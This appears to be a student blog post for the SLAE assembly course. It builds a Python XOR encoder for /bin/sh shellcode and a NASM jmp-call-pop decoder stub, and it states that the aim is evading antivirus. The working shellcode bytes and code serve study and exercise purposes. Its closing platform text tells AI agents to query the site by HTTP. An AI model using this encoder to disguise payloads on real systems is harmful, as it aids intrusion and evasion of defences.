# 0x04 SLAE - Insertion Encoder

### Introduction

The goal of the fourth assignment is to create a custom Insertion Encoder like the one presented in the course. In the Insertion Encoder there is an encoder, which is the code that will encode the shellcode. With the encoder, it can be a lot easier to understand how the encoder is encoding the shellcode since you have the code. I choose to create my encoder in Python using a xor instruction. Then, the decoder is the assembly code that will ensure to decode the shellcode encoded. Since, it is in assembly, it need to be reversed to understand how the decoder is working, which is a bit more difficult. So, the Insertion Encoder can be a good way to evade some sort of anti virus. However, today, anti virus are very sophisticated and our simple Insertion Would be detected because the xor key is in the decoder.

### The encoder

The following script represent the encoder of the shellcode exercise.

{% code title="encoder.py" %}

```python
#!/usr/bin/python

# Simple /bin/sh shellcode
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
key = 22

for x in bytearray(shellcode):
	# Simple Xor encoding
	x = x ^ key
	encoded += hex(x) + ","

encoded = encoded[:-1] + "," + hex(key)
print encoded
print "Len : {}".format(len(bytearray(shellcode)))
```

{% endcode %}

As you can see in the code above, there is the simple shellcode which execute /bin/sh to get a shell. Then, the for loop is xoring each byte with the integer `22` . In that way, the shellcode will just be gibberish since each byte has been xored with a random integer value. Then, the script is printing the encoded shellcode to be able to copy it in the assembly decoder.

#### Encoder Result

![Python script encoder](/files/-Ln3kGQ7dP8BmxEqZnCq)

`0x27,0xd6,0x46,0x7e,0x39,0x39,0x65,0x7e,0x7e,0x39,0x74,0x7f,0x78,0x9f,0xf5,0x46,0x9f,0xf4,0x45,0x9f,0xf7,0xa6,0x1d,0xdb,0x96,0x16`

### The decoder

The decoder part will do the opposite of the encoder. Instead of xoring each byte with `22` , it will xor each encoded byte with `22` . 

For example, in the encoder the xor was : 

```
# Example with the first byte
a = 22
b = 49 (0x31 in hex) 
22 ^ 49 = 39 (0x27 in hex)
```

For the decoder, it will be :

```
# Example with the first byte
a = 22
c = 39 (0x27 in hex)
22 ^ 39 = 49 (0x31) 
```

So, doing the inverse of the xor, the result is the original byte value when the xor decoding is using the same key, which is `22` in this case.

#### The assembly decoder

{% code title="decoder.nasm" %}

```
; Decoder 

global _start			

section .text
_start:
	jmp short call_shellcode

decoder:
	pop esi 

decode: 
	xor byte [esi], 0x16
	jz EncodedShellcode
	inc esi
	jmp short decode

call_shellcode:
	call decoder
	EncodedShellcode: db 0x27,0xd6,0x46,0x7e,0x39,0x39,0x65,0x7e,0x7e,0x39,0x74,0x7f,0x78,0x9f,0xf5,0x46,0x9f,0xf4,0x45,0x9f,0xf7,0xa6,0x1d,0xdb,0x96,0x16
```

{% endcode %}

In the assembly code above, we are using the jmp, call, pop technique to get the EncodedShellcode address and to avoid null byte in the shellcode. The decode function will xor each byte of the EncodedShellcode with  `0x16 (22 in int)`until the xor give zero. Once it give zero, this mean that all the byte has been xored. So, in that way, the last value is the same value as the key, which is `0x16` , because `0x16 ^ 0x16 = 0x00`.

Running the decoder shellcode:

![Decoder](/files/-Ln4cZzi0Bl6AFJticJx)

### Conclusion

The insertion decoder can be useful to hide a shellcode using a custom insertion technique. In this case, I have decided to xor each of the shellcode byte with an random value. The insertion decoder presented in the course, is a bit different since it append a `0xaa` between each byte in the shellcode. However, this kind of method can be easily detected. 

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification

<http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/>

Student ID: SLAE-1374


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://davidlebr1.gitbook.io/a-journey-in-infosec/blog/training-and-certification/slae/0x04-slae-insertion-encoder.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.